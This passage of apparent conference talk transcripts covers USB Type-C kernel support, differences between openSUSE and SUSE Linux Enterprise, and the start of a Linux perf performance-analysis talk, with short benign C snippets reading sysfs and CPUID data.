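            if (strncmp(e->d_name, "port", 4) != 0)
                continue;
            char path[512];
            /* e.g. /sys/class/typec/port0/data_role; attribute name assumed */
            snprintf(path, sizeof(path), "%s/%s/data_role", base, e->d_name);
            FILE *f = fopen(path, "r");
            if (!f)
                continue;
            char buf[64] = "";
            if (fgets(buf, sizeof(buf), f))
                printf("%s: %s", e->d_name, buf);
            fclose(f);
        }
        closedir(d);
        return 0;
    }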
There is the possibility that we want to deviate from the default in the data role or in the alternate mode. That needs a user interface. We as a distro, how am I in time? We will be faced with the fact that we will end up as a slave in some places, because people will insist on linking their laptops with type C cables, and then somebody has to be the slave. We need to do something sensible in that case. That's not yet decided, but not a question for upstream rather than for the distros. In the alternate modes, devices are more or less called for, actually required, but we've seen requirements, to implement a small rudimentary USB 2.0 device which is capable of telling the host what it wants to be in terms of alternate mode. We need to implement a driver for this. Until recently, we wanted to have this handled by Udev and the GUI. Considerations about the boot process put this into doubt. We might actually need a kernel driver for this. Obviously, we need still in addition Udev rules. The problem here is again graphics. I will come to that. We have to come to the fact that we will sometimes end up as not the power provider, but the power sink. Then we might be asked to give back power or to renegotiate our power contract. We need some user space component for this. This is asking too much of our kernel. In addition, we need a power budgeting mechanism. We can decide to not over commit, but I doubt in the long run this is viable. We need first something in the kernel which implements this, and then something in user space which decides the policy for this. Even worse, if we, for example, are to give back power, we need a way to switch off charging the battery. We need power limiters and budgeters from other parts in the kernel integrated in this power budgeting. Demon thingy, controller, however we call it. There is something worse. We are talking about Thunderbolt here and PCI. USB 2, in the case of the storage thing, are parts of the block layer. Now, I know many people here would like to see power limiting only be done in user space. The problem with this is it is, in principle, impossible. This is not even a question of system design. It is a feature of using virtual memory. You cannot do this. You will inevitably deadlock because time is short. Is here anybody who insists on a full explanation of why this is impossible? Okay. So the actual implementation will have to look something like this. And we need furthermore to come up with a sensible boot process because there is a problem. If this play port really dies as a connector, we may end up with a systems who need the type C to work during the boot process to see something. And that is a problem we haven't even started thinking about properly. So we are short in time. Any more questions? Let's somebody hand this microphone. Okay. It is supposed to be designed as durable. This is my only device. I'm not going to do a torture test on this. More questions? So are you overwhelmed, disgusted? Combination of this? Surprised? Hungry? I'm rather surprised. Either I was totally incomprehensible or... Okay. Who invented this back? Was it the ACPI guys? I guess it was a kind of conspiracy between Apple, Microsoft, Google and Intel. But if Apple was involved, why didn't they use the lightning connector which is not half as broken as this one? I guess because the other side was also involved. Any more? No? Then the case is closed now.
The talk is intended to give an overview of the technology used for the Type C connector and USB 3.1. I will cover USB role switching, selection of alternate modes and USB Power Delivery. An overview of the driver support is given. APIs are introduced and explained. The conceptual difficulties of USB Power Delivery are shown. The missing infrastructure in the kernel and user space is identified. The framework of a solution is discussed.
10.5446/54612 (DOI)
I hope you had a good lunch. If not, there's something left. Grab it. So my name is Stefan Wielert. I'm working for SUSE as a project manager on the enterprise side. And I want to talk to you and with you a little bit about Open SUSE and the enterprise part of the company. So we have a big team of project managers working on these enterprise products. So if you have questions, don't hesitate to ask. I may not be able to answer all of them, but I try. I will talk a little bit about Open SUSE and the enterprise university, the university and the similarities and differences you have there. And in the end, it stands your spotlight, but it will be a little bit more or a little bit less, depending on how you see it. As you can see, I saw this picture recently in one of our offices. All of these three are gikos, but they are a little bit different. They are not the same. They have a little bit of different coloring, a little bit of a different form, but all of them have four feet and a head and a tail. So they are similarities as well as differences. What you see here is a rough overview of how it looks like currently in the universe. You see here, tumbleweed with its more than 8,000 packages. I'm not sure what the current count is. Please don't name me down on numbers. The rolling release, you see here, Leap with the core it gets from the SUSE Lino enterprise, 6,000 packages, you may be surprised that there's no number here. The reason is simply that it's not so easy to count it. I tried it before that talk and it's roughly 2,000 source packages and between 3,000 and 4,000 binary packages. The reason why it's not so easy to count is that the enterprise product is not one product. So what you see here, we have the server side, we have extensions, we have a kind of virtual products with the support side, virtualization, the cloud product, products that are for managing the server, last but not least the desktop products. And all of these are based on the same code base, but have a different selection of packages, have sometimes additional packages, sometimes the same packages. For example, if you look here, the server products, of course, have the same kernel, but the server products don't have, for example, the open office or the Libre office packages that the desktop has. So all of this makes up the enterprise portfolio and on top of that, and it's not in that picture because I had no idea how to bring it in, we have also something separate which I will talk to you later. So whenever I talk about Sli, that means that whole code base. It's not just one product, but it might be different per product. And you see here, or you have seen that slide also, when Lutwick talked yesterday, the Libre product is built on the core and on Libre packages as well as Sli and the core. All of that gets feed, opens to the tumbleweed. So whatever is done here, and sooner or later here. Of course not for all packages because 8,000 packages, you remember, 4,000 packages roughly here, so not everything ends up there. So you may ask what are the main differences now between the enterprise and what we do in the open SUSE side. Oh, by the way, if I say open SUSE, it mostly includes all of that. I'm an enterprise guy, I'm a little bit slopey on that. I'm accustomed to say Sli when we mean all of the code base. So if I say open SUSE, it means that part of the picture and it's not mentioned for one of those specifically. Be with me here. I'm an enterprise guy. 
On the differences, I've listed here some which I will talk to you in the next few minutes. There too I will not go into detail. The first two we will come to later. Partitioning and installation workflow, it's quite different between the open SUSE products and the enterprise stuff. We have different workflows there, different kinds of installation. The partitioning is done quite differently, mostly to fit the needs of the enterprise customers, especially the server guys. When it comes to platforms, yeah, frankly speaking, that these two lines are correct and they are wrong at the same time because open SUSE, you have Leap, you have Tumbleweed, you have the ports and the stuff that is produced and on the enterprise side, you have several products and not all products are available for everything. You may wonder why I have here AR64 in brackets. The reason is very simple. With Sli 12, we start to produce AR64 images that are supported, but we are only doing so for selected hardware. You may be aware that the AR64 platform is not one, but very specific and there are small but significant differences between the various products the vendors put out there. So with the SP2 now, we will add that. We have no, as you can see, 32-bit support here any longer with Sli 12, we added with Sli 11, but we dropped it on the code 12 side and that's also a slight difference. So let's look a little bit at the lifecycle. Open SUSE Leap. Yeah. We have the core releases, you know it, we use the core sources from the enterprise. The advantage there, clear stability. It's well tested. We have our J looking at that stuff very closely in the course of developing the Sli products. You see here, the major Leap releases are supported for at least 36 months. The minor releases, yeah, it's mentioned here to be released annually. We follow here on the Leap side this Sli release cycle. On the other side, while this may look complicated, it even gets more complicated if you come to the enterprise side where it's relatively easy. When we talk about a code stream, we are talking about 10 plus years of support. So that means whatever we bring out as code 12, SP0, it will not die before that time has ended. We are currently with code 12 bringing out annually service packs. Currently we are here. We are working on SP2. You see, if you count now down, you will see when we had released Sli 12 and we are still supporting it. Of course, 10 years general support, that means we are actively producing a lot of maintenance updates, fixes, supporting it. And then there's three year of extended support as well as LTSS where I should mention that for LTSS you have to pay additional fees and then you get prolonged lifetime. So you could even nowadays, if you look at the top line with SP2 out, we would normally not support you if you are running on the GA version. But if you bought LTSS, you would still be supported until way after SP2 is out and SP3 has been developed, which adds of course a certain amount of burden to us and our developers. Just to give you an impression, think about Firefox 10 years ago, how it looked like and how the code was. Take the project you are working on or using most all day. 10 years ago, long time, think of you have to fix a bug there. Now immediately, in a day. So you can imagine that makes it very hard and adds quite a lot of burden. And that's why we have very strict rules and why we are very selective on what packages we add. 
You don't want to have a package there where you have constant bug fixes, root exploiter, anything else. You don't want anything there that's unstable and causes your system to crash. Remember what we have seen? There are a lot of service packs, but not all of these service packs are equal. So with code 12, we have switched a little bit from what we had in code 11. We have now two types of service packs. We call them refresh releases and consolidation releases. Why do we do this? Look at this, you see every year a new service pack. Imagine you have tens of thousands of servers and we ask you every year to update all of them. You can imagine what the answer of that would be. I personally don't want to do that. But on the other side, there are things where you need new stuff, where you need a new kernel for hardware support, for anything else. So we split it up in refresh releases and consolidation releases, where the refresh releases are the big service packs. That means we do, for example, a kernel major version update, upgrade the X, upgrade several versions of critical components. I mentioned your system because it's always a little bit of pain for there. You heard yesterday about the GNOME update from Frederick, so you should be aware currently SP2 is one of these refresh releases. We have the consolidation releases where we try to stabilize what we have, to fix all the bugs that are open, and to make the system overall fit to stay in that amount or in that degree to a long time. Currently, the SP1 that is out is one of these consolidation releases where we have stabilized and put the emphasize on bug fixing. But of course, we are engineers, so a few features always wander in that refresh release and the consolidation releases. So it's not so strict. And be aware, the bug fix for one customer is a feature for the next customer and the other way around. Sometimes it's not quite clear, is it now a bug fix or is it a new feature? So yeah, we solve this by saying we allow a certain amount of new features there. Package selections. I talked about that already a little bit. Customers have a very simple view of the world. They want everything the same except of that things that matters to them and that they want refreshed. But everything else should stay the same. They want fewer bugs, at least if possible, non or in things they don't use. They want stable interfaces because the application that they have should go and work. They want to know when a fix is available if they have stumbled over something. They hate regressions. So if we do a service pack update and something is no longer working afterwards, catastrophe. Yeah, they want a huge number of applications that we should support, best everything that they use, even if we have no control about it, even if it's proprietary software. And there they want to, a lot of these customers are very conservative. So updates or changes, not good, except for that one application that they need. On the other side, they want us also to be very fast. To support the latest hardware that's out there, best before it's available. They want us to be innovative. So the latest and greatest stuff being there. But it should be stable. They have feature requests that go in every direction. Different form factors. Remember when we had that change from the desktops to the tablets to the smartphones, there's newer requests coming in day by day. And think about also about the virtualization, which is for a lot of these customers just a kind of form factor. 
Yeah, and stay current the last thing they want the latest and greatest. Now you remember we had that long support lifetime. That is a little bit of a problem here, because always updating, producing the latest and greatest and keeping the same old stuff at the same time is difficult. So we looked about that and our solution to that was that we came up with the concept of modules. You will now say modules, I haven't read that on the product overview at the beginning. That's correct because these modules are components of the server product. So if you buy a server product and you register it, you get these components for free on top of it. They are fully supported. They are only delivered online, so you can't get an ISO image or download somewhere. They have a flexible life cycle. You will see later in one of the slides what that means. But in the end, it means we can put their stuff that changes very rapidly. Think about some scripting languages. Think about packages where we want the customers to be able to move to newer ones. For example, old send mail or old Java versions. If you have still the need for an old Java version and cannot go to the latest and greatest there, this is our way of providing it. Where we say you have a certain amount of time, varies a little bit from module to module, and then you should have migrated your applications to the newer version and test it if it works or not. You may ask what is a module? A module is nothing more than a collection of software packages. Simply put, it's a repository that you simply add. I think tomorrow or the day after that, you will hear from one of the colleagues about what he thinks about adding more and more repositories. But we try to make it very easy for the customers to get these packages. The most easiest way is adding a repository and make it very transparent so that you can handle it in your package manager like the rest of us. Once it's enabled, you won't see a difference there if it comes from this or that repository. The modules are set up that they are independent of each other. You can decide to use one and ignore the rest or you can add all of them. However, you do it, it doesn't matter. It's currently only available for the Susie Linux Enterprise. We are discussing adding some of those to other of the base products, but at the time being we have from our customer requests only a need here on the server side. Important, the last part here, the different life cycle of the core product. So that's important for us as well as our customers. On the implementation side, it's very transparent. Either you edit during the installation of the product or you can do it later in an install system either through YAST or to Susie Connect. It's only available online. I already said this. It's not a pattern and it's not a product. So you can't buy that. You just get it for free. I fear a small list of the available modules and I admit that one is missing. So you see here we have, for example, right at the top, the advanced systems management module, which contains, for example, the CF Engine, Puppet, the machinery tool and we are currently discussing of adding salt here. So this is for those that need these types of relatively fast changing systems. Frankly speaking, I would not like to have a Puppet or a CF Engine in the main core media where we have certain years of support where we need to be very careful of what we add and how often we upgrade. Therefore we have put it outside in a module. 
The container module where we have all Docker and additional stuff that includes, for example, also images that are prepared for the Docker side. And the good thing is if you download the base system, this last site, and you don't need anything of that, you don't have to download it. So it's just on demand if you need it and that's very important for a lot of our customers. The legacy module you see here, old Zen, mail, Java, stack, things like that. And important here, we have a different life cycle for each of these. So we have a kind of continuous integration here for the first two you see where we expect a lot of fast coming changes and we want our customers to be able to get that. But on the other side, the legacy module where we have the old side, you don't want to have or you don't expect here to have updates every month. You expect them if there's a serious security issue, but beside of that, this will be supported for three years, which gives the customers enough time to migrate to the newer stuff. And here also the tool chain module, if you have always wondered why has the server, the old GCC48, well, it's easy. We want the backward compatibility. We don't want to have any breakages there. But on the runtime side, we are able to run stuff that has been compiled with GCC5 or soon GCC6. The tool chain module has the compiler. For GCC5 currently, it will have later this year the GCC6 compiler, but the runtime will be delivered also for the base products. A short overview of how this all fits together. I've left out a few things. So the solid driver program is for partners providing driver updates, drivers for specific hardware. We have SLS and the products here with the modules. We have the SDK and we have the package hub. I will not say anything about that because Scott will have a presentation, I think, tomorrow, right, Scott? I recommend that, really, it's our solution to add things to the enterprise universe that we cannot provide at the moment with the current structure. So if you look at the differences we have between the enterprise universe and the open SUSE. For one thing, it's, of course, the stability and the enterprise hardening. Our enterprise customers ask for a lot of testing. I have a lot of complicated scenarios that most of the home users will never ever see. Complex scenarios, be it from the network side up to stacked virtualization machines and other things. So we do hear a lot of testing also together with our partners. So if you buy an IBM machine, IBM has tested the stuff there, the drivers are tested, everything is hopefully in a very good state and that's something that's very important for the customers outside. Certifications, don't nail me on the 6,000 commercial packages here, it might be more or less. It depends a little bit on the code stream. So for code 11, it's more, for code 12, it should be around that. We have certifications that are hardware specific as well as certifications that are specific to software like the FIPS certification that's important on government side or other things which are hardware specific then. In demnification, you know it, sometimes people threaten to sue the open source world with various lawsuits. We protect our customers here and that's something we only offer for the enterprise products. And very important also, the guaranteed response time for L3 box. So if one of our customers comes and says, oh, my system that serves 10,000 services down, can you help me? We have a bug here. 
We do so and we do it in a timely manner and very fast. The default configuration in the runtime is also different between open source and SLEE, but that's I think a natural thing. But there are also things where we don't differ so much. So we're using the same tools to produce the stuff. We use the build service, we use OpenQA, we use Baxilla. The first two, we just have different instances. So there's the open build service and there's an internal build service which is simply due to the fact that we have different platforms as well as that we need a certain amount of response time when building so we have reserved machines there. OpenQA, of course, two different instances because we have completely different sets of hardware, different sets of test cases that we run, but we profit on both sides for that because tests that are able to run on both are run on both. And of course, we try to use the findings that we find on the open source side as well on the SLEE side and the other way around. Of course we forgot about it, but it's very important that OpenSUSE is the base of the enterprise products. So everything you do in tumbleweed sooner or later ends up in an enterprise product, give or take the package selection. So OpenSUSE and its products are upstream for us, which is good. Sometimes we suffer then from the same problems that everybody suffers with upstream, but then we are based on the same code base. And if we go further than OpenSUSE and the same upstream products, we have a lot of things in common and that's very, very good. We are diverting later a little bit because you have seen with that long lifetime, that means also we are very reluctant of going with the latest and greatest version. I had it this morning, a discussion about version and upgrades of version. We have to be very careful if we do a version upgrade. Simply because we want the stability, we want no regressions, and customers get very nervous if they see a big change on the version numbers. That doesn't mean we don't do it, but we are careful. And very important, every package submit we do on this Lee code base is going through a review just like it's done on OpenSUSE. But we have the requirement that everything you submit there also goes into the respective devil project or factory project outside on the OBS. That means if a developer gets a bug for less 12 SP1, fixes it, submits it, we have, we look at it, we check if the same fix is already in upstream, which for us is OpenSUSE. And check is in the devil project or maybe already in one of the products. If it is, everything is fine, we accept it, case closed. If it's not, it gets complicated. There are fixes that doesn't make sense to have it outside, either because they are very platform specific, very Lee specific, think of a fix for a configuration there. There are fixes where we say we have diverted so much that we need to look carefully, is it sensible to add it to OpenSUSE or don't they suffer from it? Because they are already 15 version further ahead in that package and will never suffer from it. And there are a few things where we have diverted in the past so much that we are still struggling to get it re-merged together with what we have here on the OpenSUSE side. In an ideal world, everything that we get submitted to Lee will also end up in OpenSUSE. We are not there yet, but we are very close to it. So we are doing a good job, in my opinion, of making sure for that. 
The biggest problem we currently see here is we just check that there is a submission to the devil project, but we cannot, of course, make sure that it ends up then in the factory project. The devil project of the respective package in case you are wondering. We are also facing the same problems. In OpenSUSE, if you are a package maintainer, the upstream project, if you are not it yourself, sometimes makes decisions that you don't like. Let's say it in that way. And we are facing on this Lee side that even more, because if there is a decision done for Tumbleweed, of what direction to go, of where to spend time with development, it could be something, let's take as an example the desktop we had yesterday, what will be the default desktop, which will be concentrated, if you would decide now we drop GNOME completely from Tumbleweed, it would be a little bit of problematic for us. I don't think you do that. That's why I used that example. We all know that it can be tricky to influence upstream. Of course, the enterprise guys want to influence also the OpenSUSE guys to go a little bit in one direction or the other where we think it's useful to do so. And you know how it is with communities, the opinions there are widespread. So if we say we would like to see this, that doesn't mean that everybody sees it that way, not even inside of the enterprise community. So we are struggling there and we have the same problems in both worlds with the fact that we are all humans. And when I looked at it, then I came up with a sort of things or points where I'm not sure if we are similar or if we are different because on a certain degree we are different, but on the other side, we are not so different. Package reviews, submit reviews, I mentioned it earlier. They are done for OpenSUSE. They are done for the sleep products. Mostly the same rules apply. So if you wonder what are the rules on the enterprise side to get a fix submitted, look at the OpenSUSE rules, most of them are identical. We have a few ones where we are more strict and where we are more relaxed, but in the end they are nearly similar. One of the things we, for example, ask for is bug numbers, but there are cases where we also say no, we don't need them. It's okay in that way because it's just a build fix or something like that. On the packages that get submitted, for example, if you rebase your packages, you don't need to mention all the packages, the packages there and the package that you have rebased. It's enough if you say we did it. If you do a big version update, we are fine with having said, we have a new version update, we drop all the packages. We accept that. And of course the interpretation of all these rules is a little bit different between OpenSUSE reviewers and sleep reviewers. I admit here that it's also different by the sleep reviewers' insights, so depending on who does it, it might be that one thing is okay and the other not. But we try to be very much on the same level there, at least inside of the much smaller sleep review group that we have compared to OpenSUSE. The configuration options, it's natural. It doesn't mean the change for the building time. You will say, of course they do, but sometimes developers forget about that. For example, OpenSUSE, Wayland, do we have it on or off? Who would know that? Currently, it's on, as far as I know. 
On the sleep side, we have disabled it, which gives you on some builds completely different problems than you have never seen before, and that makes it also different and sometimes hard for us to work. And of course the S390X platform, I mention it because I have colleagues who are driving very much the project to get this also on the OBS working. It will come sooner or later. We would like to see it. We see their problems and things that are good that we would like to give you to the outside too. But I'm pretty sure most of you that are here don't have an S390X at home. A short outlook, and it will be really short because otherwise I will run out of time. You see here the timeline. Ludwig talked yesterday about where he is with Leap. We have released on the sleep side for SP2, beta 3 last week, and in one and a half weeks we will release beta 4. So we are currently going towards the RC phase where we are very strict with what we apply and what we do. I already mentioned it, SP2 is a refresh release, so that means we have a kernel version upgrade, we have a system de-upgrade, hardware, ISV certifications should stay stable. A little bit on the details, you have seen it most likely on the Leap releases already. We use on the currently kernel 4.4, heavily patched with stuff from 4.5, 4.6, and sometimes even beyond. We will support NVDIM as a tech preview, Intel Omnipass, we have Xen 4.7 included. SP2 will be the first one with TPM 2.0 support, which is very much in demand by our customers, but has still quite some culprits on the upstream side. System D288, I mentioned this because it caused quite some discussion recently. We are using Wicked in the enterprise products, we are not using system D network D. Please let us not discuss why we do it or that. We simply said we cannot support system D network D in a way that we currently would need and we think that Wicked is the better solution currently for our enterprise customers. Software defined anything is currently the big buzzword and we are preparing our system here for software defined networking. We have added the data plane development kit as well as integration of that into the Open vSwitch package. This is something where a lot of the telecoms are looking forward to and we plan to invest here more with future service packs. I mentioned it on the ARM side. AR64 for selected hardware will be first time supported with SP2. Frederick mentioned yesterday, GNOME 3.20. We have also updated quite a lot of fonts which you hopefully will not see, but in some cases might. So your monitor is not broken there, but it's a different font. And one thing that is important for our customers, we have now support for skipping a service pack. So if you want to go from a consolidation service pack to a consolidation service pack, you can do it and skip the refresh. Or if you want only the refresh ones, you can do that also. In former times you had to go through all of the service packs. That means if you were still on service pack zero, you had to go to one, to two, to three, to four. Now you can skip, which sounds more easier than in reality it is. If you consider how much packages and configuration change, if you think about package splits, if you think about package merges and the requirements there. And we had on the enterprise site always beta programs running. These were very close beta for selected partners, customers, you had to apply for it. With SP2, we decided to be much more open to make an experiment and open up the public beta. 
That means everybody who is sitting here can join the public beta program. If you are interested in that, go to the Susiecom web page on look for the beta program. You need to fill out a little bit of stuff, but otherwise you can join it and there is no restriction there. It's a big step forward for us because the infrastructure to support all of those people that will join is significant and we want also your bug reports that are coming in to not go down in a big pile of bug reports but to process them and currently we are coping with that. I would be happy if we are no longer being able to that because all of you join and have so many bug reports and fixes. So please join. Looking a little bit beyond what we currently had, you remember that picture here? There's one part missing and that's at the end of the leap when it comes to the next code stream. I think there are some parts where we are still lacking in our cooperation between the enterprise and the open Susie part. So we are currently doing a batch of getting patches that go to factory into the enterprise universe. There is currently no way that the reviewer in the open Susie world can see if that patch has been submitted to the enterprise if it's relevant there or to make note on that to the enterprise developers. I don't have an answer for that to be honest. I don't know how to solve it. If one of you have a good, genial idea, speak up. I would like to hear ideas here. Speed ups. I'm not sure how much it's true but one complaint we often hear as project managers is that the time until a patch or submission gets reviewed on the open Susie side is too long. On the other side we are also seeing a big cue on the legal review side that we have under control and we need to see what we can do to speed that up. We have a very pushy, less release manager who always dreams of having a patch being submitted and one hour later he has a completely tested new image out of the system available and I can tell you that's not working and we tell that to him every day. The fastest we are currently on the open on this lease side is four hours. It takes four hours until a patch has been submitted, pretested for submission, everything built, fallen out and retested and that's the fastest we can get currently which is very improvable. Dependencies. If you are looking forward for the next code stream, code 13 and others, have you ever looked at our built requires and our requires in the packages? If you are a package maintainer please have a look at that. We need to clean that up. We need to reduce the complexity here. The complexity currently is really, really big. We had it recently. I think it was XRDP package that got submitted and it triggers LibreOffice. I mean that's a natural connection, right? You have an XRDP and you build an Office Suite. It's simply because the built requires are relatively lax there and they require that. If it's submitted, build LibreOffice new. It doesn't make any difference but please do it. We have hundreds of these connections inside. That makes it hard for OpenSUSE to build in a fast way. That blocks the build service and it makes it very hard for us on the enterprise side where we have or we try to reduce the number of packages that we have and we want in the next few months to reduce that a little bit. The enterprise guys will look at that and you will see patches coming also to OpenSUSE. Let's say, hey, drop this, build requires or drop this requires because it's no longer needed. 
We find with every release we do leftovers from ancient times where we still have requires or build requires that are no longer needed. Many of these that we remove helps us tremendously and going either further, do we really need a requirement on some place to build the 750 plug-in for a program? Is anybody using that or is it just that we added because it's there? I would like to see us thinking about that a little bit. If you're a package maintainer, do you really need all the plug-ins that you have enabled? Is it really needed that we add all of those? Because with every dependency we add, the complexity goes up quite tremendously. And last but not least, join us. We have open jobs. There's a lot of jobs open for everybody and we would like to see you if you're not already a Suzy employee to join us and to strengthen our team. With that, I would now be open for questions and discussions because I think we cannot just live each on our own. The open Suzy world here, the Slee world here, but it's an interaction and with Leap we have come closer together, but there's still quite a lot of things that we can do to improve. So that's it from our side. All their questions. How often do we get major releases? There isn't anything about that. You mean on the enterprise side? Both. On the enterprise side, and I'm being careful here so that no product manager will kill me afterwards. It's roughly currently three and a half years between the major releases that we target for. We had more time between code 11 and 12, but for code 13 we are currently thinking about that timeframe. So for the Leap releases that would mean also that 43 would then be most likely three and a half roughly years after that. But that's just an inofficial number because we have not agreed on that yet. The project managers are discussing this with the product managers currently how to do it best on the schedule because that's always a little bit tricky, but three and a half is roundabouted. Other questions? If not, then thank you everybody. As mentioned, we have jobs and look out for our beta program. Our beta program manager is happy to add everybody who wants. So feel free to apply there. Thank you very much. Thank you. Thank you. Thank you.
Leap and the SUSE Linux Enterprise products share a lot of things in common. At the same time, they vary in a lot of aspects. Some of them are caused by fundamental differences in the philosophy and the basic properties of the projects. With the upcoming SP2 of CODE 12 of SUSE Linux Enterprise it's time to look at those differences and similarities, as the codebases will be getting closer again.
10.5446/54614 (DOI)
Okay. My name is Tony Jones and I am a senior software engineer in the performance group at SUSE Labs. Our primary responsibility is basically the kernel side: finding kernel bugs, detecting kernel performance bugs, fixing kernel performance bugs, and working on the tooling that helps us find kernel performance problems. I am based in Portland, Oregon, which is the true home of real beer, so come and visit. Anyway, there's my email there, so if you have any questions about the talk or whatever, just send me an email. So the first thing to bear in mind is that performance analysis is not easy. If you find yourself having to do it, go easy on yourself. It's extremely subjective: two different people can have two different opinions regarding what is fast and what is slow. If you have a performance problem, regressions are generally the easiest thing to deal with. You can run the performance monitoring tools and, in conjunction with a bisection, you can just go and find the problem and fix the code. But if you have to take it from the other direction, where it's brand new code you've never seen before, or code that worked fine before but now you're running on new hardware, it can be a challenge. In that case there's a whole bunch of what are called performance analysis methodologies. Basically we're talking about a procedure, something to keep you on the right track and stop you from running around in the weeds. There are lots of different methodologies, with different degrees of formality. It's a topic outside of this talk, but you can go and Google them. Bottom line: be methodical. If you only have to do infrequent analysis, what I recommend is what I call the bugzilla methodology, which is basically to go and do the steps that we would expect from you if you were filing a bug with SUSE. So try and quantify the problem at the top level. Does the whole system feel sluggish, or a particular component? Just try and break it down. If you can't quantify it, then you have to ask yourself, well, why do I think there's a performance problem? Is it new or has it always been there? Obviously you only make one config change at a time on the system, so what's changed recently on the system? Does it occur on particular hardware, and so on. You don't have to know every single command line option, but it's very useful to know what tools exist. Also, the documentation can be thin to non-existent, and it can be wrong. So don't be scared to write code. If you think the performance tools are saying, okay, in this situation we'll do this, and in that situation we'll report that, don't be scared to dig in, write yourself some code, test out your hypothesis, tweak the code, and keep going like that, so you can say, oh, when I write my code to provoke cache misses, then the performance tools tell me this information. That's pretty useful just as practice before you ever have to actually dig in. And if you do dig in, you can always fall back on the blame-somebody-else methodology, which is really good. So there are lots of tools. Perf is only one, and it is not the first one you're going to want to use. If you think you have some kind of performance issue on your system, the number one place to start is dmesg and the syslog. Look and see if you have any particular unusual entries in your logging. After that, the standard top utility: get an idea if it's CPU bound, and if it's user space or kernel space.
If it's not CPU bound, then dig into the iostat and vmstat type tools and get an idea about what the virtual memory and IO behavior is. And then finally, strace, which uses the ptrace API, is an extremely useful tool for getting an idea about system call behavior and system call latencies. So we'll talk a little bit about performance counters. In the old days you tended to use tools like prof, which were really basic, bucket-based software profilers. These days, if you want to do something like that, you're better off using Valgrind. Basically, a performance counter is a hardware resource to aid in performance analysis. It's been available on x86 since the Pentium 3. Availability is discovered through the CPUID instruction and the MSRs, the model-specific registers. You'll see the term arch perfmon used a lot. It stands for architectural performance monitoring, which basically means that Intel has agreed that this will be available in future architectures, and that provides about seven or eight counters. Standardized, because the microarchitectures are different, means that it exists, but it doesn't necessarily mean that it'll be implemented in exactly the same way. And beyond this, each separate microarchitecture, so that's Nehalem, Broadwell, Haswell, et cetera, implements a whole slew of microarchitecture-specific counters. Each microarchitecture has different numbers of performance counters and so on. So taking a step back: perfmon2 was the first in-tree subsystem that used performance monitoring hardware, and that was designed by HP for Itanium. It's still in the kernel tree as of today for Itanium. It was extended for other architectures, specifically x86-64, in 2008. The interesting thing about perfmon was that nearly all of the logic was pushed into the libraries. There was a library called libpfm and a tool called pfmon, and the actual kernel side was very small. That got submitted to LKML in 2008, and in fact there has been a lot of controversy over the years about tools that live out of tree. Also, perfmon exposed most of the counter complexity to the users, under the theory that it was complex anyway, so don't try and hide it. And there was a counter-proposal that came out almost immediately afterwards, which was called Performance Counters for Linux: a single syscall-based interface with nearly all the complexity pushed into the kernel, and the tool not out of tree. The tool lived in tools/perf. That got merged into the kernel in 2009, Performance Counters for Linux, kernel version 2.6.31, and it's now known by the almost un-googleable term perf events. It is a Swiss Army knife of functionality. Mostly it's focused on CPU usage tracing, but it can also be a benchmarking tool, and you can also use it for statistical analysis. So we're going to talk mostly about perf now. So, curious, how many people here have actually used perf? Okay. How many would you think are reasonably expert in this? Okay, that's good. So where to begin? First thing, install it. We package it as an RPM for openSUSE Tumbleweed, Leap and the SLE releases. And like similar tools such as zypper and git, it exposes a hierarchical command interface. So the first thing you're going to do is type in perf help, and that will list you all the different subcommands. There are many of them, but these here are the ones that you're most likely to encounter. perf top is pretty much like the Unix top utility. list will list you the events.
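Stepping back to the hardware counters for a moment before continuing with the subcommand list: the arch perfmon facilities can be queried directly with CPUID. Here is a minimal sketch, assuming an Intel x86 machine and a compiler that ships <cpuid.h> (GCC or clang); the field layout follows Intel's published description of leaf 0xA, and on CPUs without arch perfmon the leaf simply reads as zero.

    #include <cpuid.h>
    #include <stdio.h>

    int main(void)
    {
        unsigned eax = 0, ebx = 0, ecx = 0, edx = 0;
        /* Leaf 0xA is the architectural performance monitoring leaf. */
        if (!__get_cpuid(0xA, &eax, &ebx, &ecx, &edx) || (eax & 0xff) == 0) {
            puts("no architectural perfmon reported");
            return 1;
        }
        printf("arch perfmon version: %u\n", eax & 0xff);
        printf("general-purpose counters per logical CPU: %u\n", (eax >> 8) & 0xff);
        printf("counter width (bits): %u\n", (eax >> 16) & 0xff);
        printf("fixed-function counters: %u\n", edx & 0x1f);
        return 0;
    }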
Back to the subcommands: record is the sampling interface. report is a reporting tool. annotate will give you source code annotation. trace is the tracepoint interface. And there's one more that I forgot, which I shouldn't have, which is perf stat, and we'll talk about that a lot. So the first thing that you're going to do is run perf list, and this is going to produce a lot of output. I've pretty much sliced it away here with these ellipses, but what you'll see happening is that perf is aggregating many different event sources into this event list. So you have hardware events here, you have software events, hardware cache events, raw events, and tracepoint events. The hardware events are the events exposed by the performance monitoring hardware, the same as the hardware cache events. The software events are pseudo events that are exposed by the kernel, so in this case, context switches. The raw events are a way of specifying the raw hex code to access the low-level performance counter events. And tracepoint events are a way for the existing ftrace infrastructure to be exposed into perf. Most people are probably familiar with ftrace. It's a static tracepoint feature in the kernel where particular points of interest have been marked, and then it's low-cost tracing, if enabled, basically dumping data to a ring buffer. So one thing we notice here is that under the hardware events we've got cache-misses, cpu-cycles (or cycles) and instructions. These are what is termed an event moniker, which is basically an alias for an event. You won't find these in any Intel documentation whatsoever. This gets to the issue of perfmon versus perf: they wanted to abstract the event names so it was easy for users, so I didn't have to know what the hell my event type was. So on this machine I'm running, which is a Xeon E5: if I look in /sys/devices/cpu/events, I will find a file called cpu-cycles which matches that event moniker, and if I cat that, I will get the value 0x3c. Now, I mentioned that libpfm still exists. That was the library from perfmon, and it got repurposed into a kind of higher-level wrapper over perf to help you decode events. The showevtinfo command comes from the libpfm-devel package. If you install that and run it, it dumps all of our events out to a file, and if I open that file and search for 0x3c, I will get this entry here. The interesting things about this: the first thing you can see is the PMU name, so it's one of the arch perfmon events. This is one of the architectural events that Intel has guaranteed will be available on the hardware. There's a description: count core clock cycles whenever the clock signal on the specific core is running. So it's not running if the CPU is halted, and it's also worth mentioning that it's subject to frequency scaling. If you want to count at the reference cycle rate, a constant rate, use the ref-cycles event instead. By comparison, this is the same information from an Opteron AMD system, and we can see in this case that the event is 0x76. So the point I'm trying to make here is that it's not apples to apples. Even though you might be monitoring CPU cycles on multiple different machines, they're mapping to multiple different underlying event representations. Sometimes on the Intel architecture these are mapped to architectural perfmon events; sometimes they map to microarchitectural events that are specific to one microarchitecture.
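Here is a tiny sketch of reading those moniker definitions programmatically, using the same /sys/devices/cpu/events directory mentioned above. The strings it prints (for example event=0x3c for cpu-cycles on this machine) differ between microarchitectures, and the directory may be absent on kernels without perf support.

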